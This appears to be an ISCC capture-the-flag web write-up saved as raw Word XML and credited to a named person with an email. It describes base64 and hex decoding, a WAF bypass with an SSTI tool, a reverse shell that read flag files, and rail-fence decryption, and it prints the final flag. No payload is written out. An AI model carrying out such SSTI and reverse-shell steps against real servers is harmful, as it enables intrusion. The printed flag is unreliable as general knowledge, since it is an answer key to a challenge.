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30E96BA6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</w:p>
    <w:p w14:paraId="1AEF4043" w14:textId="0826ED7E" w:rsidR="00AF064E" w:rsidRDefault="001B495D" w:rsidP="00AF064E">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B495D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="001B495D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hooops</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AF064E" w:rsidRPr="001B495D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="001B495D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>李卓航</w:t>
      </w:r>
      <w:r w:rsidR="00AF064E" w:rsidRPr="001B495D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>925798691@qq.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDB5BC2" w14:textId="4B1C22D2" w:rsidR="001B495D" w:rsidRPr="00F66B02" w:rsidRDefault="001B495D" w:rsidP="001B495D">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="006D7CD7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidR="00F66B02" w:rsidRPr="00F66B02">
        <w:t>回来</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F66B02" w:rsidRPr="00F66B02">
        <w:t>吧永远滴</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F66B02" w:rsidRPr="00F66B02">
        <w:t>神</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A76CDE5" w14:textId="048FD9EE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25A01A4B" w14:textId="661A86E0" w:rsidR="00EA3779" w:rsidRDefault="0035409A" w:rsidP="00EA3779">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网站首页：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037AD305" w14:textId="0E9621E9" w:rsidR="00213493" w:rsidRDefault="00213493" w:rsidP="00EA3779">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="24ADD859" wp14:editId="309F95E0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5274310" cy="1882140"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="652243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431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网页源代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5760457E" w14:textId="4AED59AD" w:rsidR="00213493" w:rsidRPr="00213493" w:rsidRDefault="00213493" w:rsidP="00EA3779"/>
    <w:p w14:paraId="443DF1F5" w14:textId="77777777" w:rsidR="006B61FE" w:rsidRDefault="006B61FE" w:rsidP="00EA3779">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="20D3BA33" wp14:editId="4E7A6B65">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-85090</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>419735</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="3004820"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="148879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9276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填入四位队友：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4AF3FB" w14:textId="77777777" w:rsidR="00CF4697" w:rsidRDefault="006B61FE" w:rsidP="00EA3779">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到隐藏关卡</w:t>
      </w:r>
      <w:r w:rsidR="00CF4697">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCD131F" w14:textId="62E5C4EA" w:rsidR="00CF4697" w:rsidRDefault="00CF4697" w:rsidP="00EA3779"/>
    <w:p w14:paraId="03CC1E7F" w14:textId="77777777" w:rsidR="00CF4697" w:rsidRDefault="00CF4697" w:rsidP="00EA3779"/>
    <w:p w14:paraId="5CCA6A86" w14:textId="77777777" w:rsidR="000F5B24" w:rsidRDefault="000F5B24" w:rsidP="00EA3779"/>
    <w:p w14:paraId="3D73E1F0" w14:textId="5C657F81" w:rsidR="006B61FE" w:rsidRDefault="00A91ABA" w:rsidP="00EA377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A020DA" wp14:editId="5173F66B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-23642</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="3004820"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="35041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1479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745F8" w14:textId="00AB72D7" w:rsidR="006B61FE" w:rsidRDefault="00D01E13" w:rsidP="00EA3779">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="64E4FB1E" wp14:editId="77209DCD">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-37972</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>393909</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="610870"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1514452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246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网页源代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D4A049" w14:textId="44704FC9" w:rsidR="00D01E13" w:rsidRDefault="00D01E13" w:rsidP="00D01E13">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看到</w:t>
      </w:r>
      <w:r w:rsidRPr="00D01E13">
        <w:t>integrity=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7A14AA" w14:textId="587852C7" w:rsidR="00D01E13" w:rsidRDefault="00D01E13" w:rsidP="00D01E13">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D01E13">
        <w:t>"sha384-NDY2YzYxNjc1YjMwNWQzYTIwNDk3YjQ0NTM0YjM2NDY2YTM3NjM="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B14FB4" w14:textId="6C8623D0" w:rsidR="00D01E13" w:rsidRDefault="00687AE0" w:rsidP="00EA3779">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看结尾的等号可能和base64有关，</w:t>
      </w:r>
      <w:r w:rsidR="00EB4428">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在base64</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00EB4428">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的官网</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其解码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53432EFB" w14:textId="240D44C4" w:rsidR="00687AE0" w:rsidRDefault="00687AE0" w:rsidP="00EA3779">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到</w:t>
      </w:r>
      <w:r w:rsidR="00EB4428" w:rsidRPr="00EB4428">
        <w:t>466c61675b305d3a20497b44534b36466a3763</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548BD9F9" w14:textId="15C2A7B8" w:rsidR="00867590" w:rsidRDefault="00867590" w:rsidP="00EA3779">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用脚本1，得到：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3256FBD8" w14:textId="086F33D3" w:rsidR="00867590" w:rsidRDefault="00867590" w:rsidP="00EA3779">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7ED04AD3" wp14:editId="50F4D3B0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>71988</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>92935</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1809843" cy="393720"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="253570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706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9CCE4" w14:textId="3C1AAA45" w:rsidR="00867590" w:rsidRDefault="00867590" w:rsidP="00EA3779"/>
    <w:p w14:paraId="4F8A9284" w14:textId="7C9E9861" w:rsidR="00867590" w:rsidRDefault="00867590" w:rsidP="00EA3779">
      <w:r>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lag的第一部分是</w:t>
      </w:r>
      <w:r w:rsidRPr="00867590">
        <w:t xml:space="preserve">Flag[0]: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00867590">
        <w:t>I{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00867590">
        <w:t>DSK6Fj7c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5080457D" w14:textId="5CA4E7C1" w:rsidR="000F5B24" w:rsidRDefault="000F5B24" w:rsidP="00EA3779">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试在隐藏关卡的输入框中提交：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18ECDE82" w14:textId="18D36774" w:rsidR="000F5B24" w:rsidRDefault="000F5B24" w:rsidP="00EA3779">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>waf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531EF0FD" w14:textId="06B99A59" w:rsidR="000F5B24" w:rsidRDefault="007510BD" w:rsidP="00EA3779">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="73C000F0" wp14:editId="1963052D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4083050" cy="1720850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1807214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1468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926E4" w14:textId="77777777" w:rsidR="000F5B24" w:rsidRDefault="000F5B24" w:rsidP="00EA3779"/>
    <w:p w14:paraId="1B9753FF" w14:textId="77777777" w:rsidR="000F5B24" w:rsidRDefault="000F5B24" w:rsidP="00EA3779"/>
    <w:p w14:paraId="5BD346A7" w14:textId="1DEB9BA5" w:rsidR="000F5B24" w:rsidRDefault="000F5B24" w:rsidP="00EA3779"/>
    <w:p w14:paraId="6611531E" w14:textId="77777777" w:rsidR="000F5B24" w:rsidRDefault="000F5B24" w:rsidP="00EA3779"/>
    <w:p w14:paraId="637A8CE0" w14:textId="77777777" w:rsidR="000F5B24" w:rsidRDefault="000F5B24" w:rsidP="00EA3779"/>
    <w:p w14:paraId="69E5FDF1" w14:textId="1CB98788" w:rsidR="000F5B24" w:rsidRDefault="007510BD" w:rsidP="00EA3779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9846FF" wp14:editId="6CF5966A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>586533</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>14605</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4140413" cy="2324219"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="768895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504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B24B0" w14:textId="28390736" w:rsidR="000F5B24" w:rsidRDefault="000F5B24" w:rsidP="00EA3779"/>
    <w:p w14:paraId="41D94C3A" w14:textId="77777777" w:rsidR="000F5B24" w:rsidRDefault="000F5B24" w:rsidP="00EA3779"/>
    <w:p w14:paraId="7A655CBC" w14:textId="77777777" w:rsidR="000F5B24" w:rsidRDefault="000F5B24" w:rsidP="00EA3779"/>
    <w:p w14:paraId="2671EB98" w14:textId="4A6D8C75" w:rsidR="000F5B24" w:rsidRDefault="000F5B24" w:rsidP="00EA3779"/>
    <w:p w14:paraId="3D056DB4" w14:textId="52F0D82B" w:rsidR="00867590" w:rsidRDefault="00867590" w:rsidP="00EA3779"/>
    <w:p w14:paraId="1E2A1300" w14:textId="14BC515B" w:rsidR="00867590" w:rsidRDefault="00867590" w:rsidP="00EA3779"/>
    <w:p w14:paraId="7E605507" w14:textId="0670BCCD" w:rsidR="00F17250" w:rsidRDefault="00F17250" w:rsidP="00EA3779"/>
    <w:p w14:paraId="463943B0" w14:textId="1FDDA594" w:rsidR="00F17250" w:rsidRDefault="00F17250" w:rsidP="00EA3779"/>
    <w:p w14:paraId="2E81342B" w14:textId="06FA1DE5" w:rsidR="00F17250" w:rsidRDefault="00F17250" w:rsidP="00EA3779"/>
    <w:p w14:paraId="29991D68" w14:textId="1278EA1A" w:rsidR="009F297D" w:rsidRDefault="007510BD" w:rsidP="00EA3779">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="72EBE65C" wp14:editId="43B9A3FD">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>12522</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4908802" cy="2971953"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="738613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1397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5DA55" w14:textId="06DE6446" w:rsidR="009F297D" w:rsidRDefault="009F297D" w:rsidP="00EA3779"/>
    <w:p w14:paraId="5DD932BE" w14:textId="04659A38" w:rsidR="009F297D" w:rsidRDefault="009F297D" w:rsidP="00EA3779"/>
    <w:p w14:paraId="72564163" w14:textId="109A52AB" w:rsidR="009F297D" w:rsidRDefault="009F297D" w:rsidP="00EA3779"/>
    <w:p w14:paraId="05CA2B7B" w14:textId="7D3F9C0F" w:rsidR="009F297D" w:rsidRDefault="009F297D" w:rsidP="00EA3779"/>
    <w:p w14:paraId="7506294A" w14:textId="25A619F1" w:rsidR="009F297D" w:rsidRDefault="009F297D" w:rsidP="00EA3779"/>
    <w:p w14:paraId="0B89676A" w14:textId="4CA848AD" w:rsidR="009F297D" w:rsidRDefault="009F297D" w:rsidP="00EA3779"/>
    <w:p w14:paraId="0CFB6593" w14:textId="54266399" w:rsidR="009F297D" w:rsidRDefault="009F297D" w:rsidP="00EA3779"/>
    <w:p w14:paraId="7976C113" w14:textId="594581D1" w:rsidR="00030AE8" w:rsidRDefault="00030AE8" w:rsidP="00EA3779"/>
    <w:p w14:paraId="7FCECF60" w14:textId="273241A6" w:rsidR="00030AE8" w:rsidRDefault="00030AE8" w:rsidP="00EA3779"/>
    <w:p w14:paraId="7E558A18" w14:textId="472C2210" w:rsidR="00030AE8" w:rsidRDefault="00030AE8" w:rsidP="00EA3779"/>
    <w:p w14:paraId="35541B96" w14:textId="29756704" w:rsidR="00030AE8" w:rsidRDefault="00030AE8" w:rsidP="00EA3779"/>
    <w:p w14:paraId="52425B55" w14:textId="087B2D3F" w:rsidR="00030AE8" w:rsidRDefault="009867AD" w:rsidP="00EA3779">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009867AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>焚</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009867AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>靖</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSTI工具</w:t>
      </w:r>
      <w:r w:rsidR="00A6290B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，脚本二</w:t>
      </w:r>
      <w:r w:rsidR="00A6290B" w:rsidRPr="00A6290B">
        <w:t>跑出payload并发送</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE5F426" w14:textId="76C671E8" w:rsidR="00030AE8" w:rsidRDefault="00423F91" w:rsidP="00EA3779">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反弹shell，</w:t>
      </w:r>
      <w:r w:rsidR="00A6290B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读到flag[1]和flag[2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3369C459" w14:textId="20AB1AD5" w:rsidR="009A044C" w:rsidRDefault="009A044C" w:rsidP="00EA3779">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F3114F9" wp14:editId="78FE8C1D">
            <wp:extent cx="1790792" cy="171459"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1582534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34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C82" w14:textId="063C5439" w:rsidR="00030AE8" w:rsidRDefault="009A044C" w:rsidP="00EA3779">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5377CA20" wp14:editId="3592090A">
            <wp:extent cx="1803493" cy="177809"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1481705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05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EE36" w14:textId="44377059" w:rsidR="00030AE8" w:rsidRDefault="00983D21" w:rsidP="00EA3779">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看源代码，找到flag[3]加密逻辑</w:t>
      </w:r>
      <w:r w:rsidR="00056427">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，解密后得到：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00056427" w:rsidRPr="00056427">
        <w:t>CaehJST_k</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00056427" w:rsidRPr="00056427">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D246CD" w14:textId="77777777" w:rsidR="00983D21" w:rsidRDefault="00983D21" w:rsidP="00EA3779">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DDBD3A9" w14:textId="590843FD" w:rsidR="00030AE8" w:rsidRDefault="00030AE8" w:rsidP="00EA3779"/>
    <w:p w14:paraId="7C1E922C" w14:textId="77777777" w:rsidR="00030AE8" w:rsidRDefault="00030AE8" w:rsidP="00EA3779"/>
    <w:p w14:paraId="4D0E62E0" w14:textId="77777777" w:rsidR="00030AE8" w:rsidRDefault="00030AE8" w:rsidP="00EA3779"/>
    <w:p w14:paraId="1AE08782" w14:textId="7ACFA006" w:rsidR="00030AE8" w:rsidRDefault="00030AE8" w:rsidP="00EA3779"/>
    <w:p w14:paraId="578CB2ED" w14:textId="5820D4C8" w:rsidR="00030AE8" w:rsidRDefault="00983D21" w:rsidP="00EA3779">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>四个部分连在一起得到：</w:t>
      </w:r>
      <w:r w:rsidRPr="00983D21">
        <w:t>I{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00983D21">
        <w:t>n_zIcCmoSFdoLEoaeoClrai_unIUCaehJST_k</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00983D21">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174F52E2" w14:textId="30D91149" w:rsidR="00030AE8" w:rsidRDefault="00030AE8" w:rsidP="00EA3779"/>
    <w:p w14:paraId="72D1C6FE" w14:textId="272AA04F" w:rsidR="00030AE8" w:rsidRDefault="00983D21" w:rsidP="00EA377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1787FB" wp14:editId="43FEE9B5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-67310</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>449580</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4552950" cy="2736850"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1237522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2266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栅栏密码，移位之后得到flag：</w:t>
      </w:r>
      <w:r w:rsidR="00FC0258">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="111111"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ISCC{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FC0258">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="111111"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Flandre_oahzLiJIE_ScouTCan_meIkooU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FC0258">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="111111"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C79337C" w14:textId="36DA6C33" w:rsidR="00030AE8" w:rsidRDefault="00030AE8" w:rsidP="00EA3779"/>
    <w:p w14:paraId="32BDD723" w14:textId="306AE725" w:rsidR="00030AE8" w:rsidRDefault="00030AE8" w:rsidP="00EA3779"/>
    <w:p w14:paraId="07FC610A" w14:textId="3D663121" w:rsidR="00030AE8" w:rsidRDefault="00030AE8" w:rsidP="00EA3779"/>
    <w:p w14:paraId="00744C29" w14:textId="4E421178" w:rsidR="00030AE8" w:rsidRDefault="00030AE8" w:rsidP="00EA3779"/>
    <w:p w14:paraId="298325C5" w14:textId="77777777" w:rsidR="00030AE8" w:rsidRDefault="00030AE8" w:rsidP="00EA3779"/>
    <w:p w14:paraId="48C00912" w14:textId="77777777" w:rsidR="00030AE8" w:rsidRDefault="00030AE8" w:rsidP="00EA3779"/>
    <w:p w14:paraId="59FCA322" w14:textId="77777777" w:rsidR="00030AE8" w:rsidRDefault="00030AE8" w:rsidP="00EA3779"/>
    <w:p w14:paraId="655A35E6" w14:textId="77777777" w:rsidR="00030AE8" w:rsidRDefault="00030AE8" w:rsidP="00EA3779"/>
    <w:p w14:paraId="3C99D815" w14:textId="77777777" w:rsidR="00030AE8" w:rsidRDefault="00030AE8" w:rsidP="00EA3779"/>
    <w:p w14:paraId="2224BB98" w14:textId="77777777" w:rsidR="00030AE8" w:rsidRDefault="00030AE8" w:rsidP="00EA3779"/>
    <w:p w14:paraId="2FB304D1" w14:textId="77777777" w:rsidR="00030AE8" w:rsidRDefault="00030AE8" w:rsidP="00EA3779"/>
    <w:p w14:paraId="20090BAC" w14:textId="77777777" w:rsidR="00030AE8" w:rsidRDefault="00030AE8" w:rsidP="00EA3779"/>
    <w:p w14:paraId="7EEF6BFD" w14:textId="72850116" w:rsidR="00867590" w:rsidRDefault="00867590" w:rsidP="00EA3779">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本1：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCF7A40" w14:textId="77777777" w:rsidR="00867590" w:rsidRPr="00867590" w:rsidRDefault="00867590" w:rsidP="0086759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867590">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t># Hexadecimal string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B91F033" w14:textId="77777777" w:rsidR="00867590" w:rsidRPr="00867590" w:rsidRDefault="00867590" w:rsidP="0086759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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00867590">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hex_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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86759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867590">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"466c61675b305d3a20497b44534b36466a3763"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B88D3F" w14:textId="77777777" w:rsidR="00867590" w:rsidRPr="00867590" w:rsidRDefault="00867590" w:rsidP="0086759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6B0F96FB" w14:textId="77777777" w:rsidR="00867590" w:rsidRPr="00867590" w:rsidRDefault="00867590" w:rsidP="0086759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867590">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t># Convert hex to bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50200701" w14:textId="77777777" w:rsidR="00867590" w:rsidRPr="00867590" w:rsidRDefault="00867590" w:rsidP="0086759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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00867590">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>bytes_data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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86759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867590">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
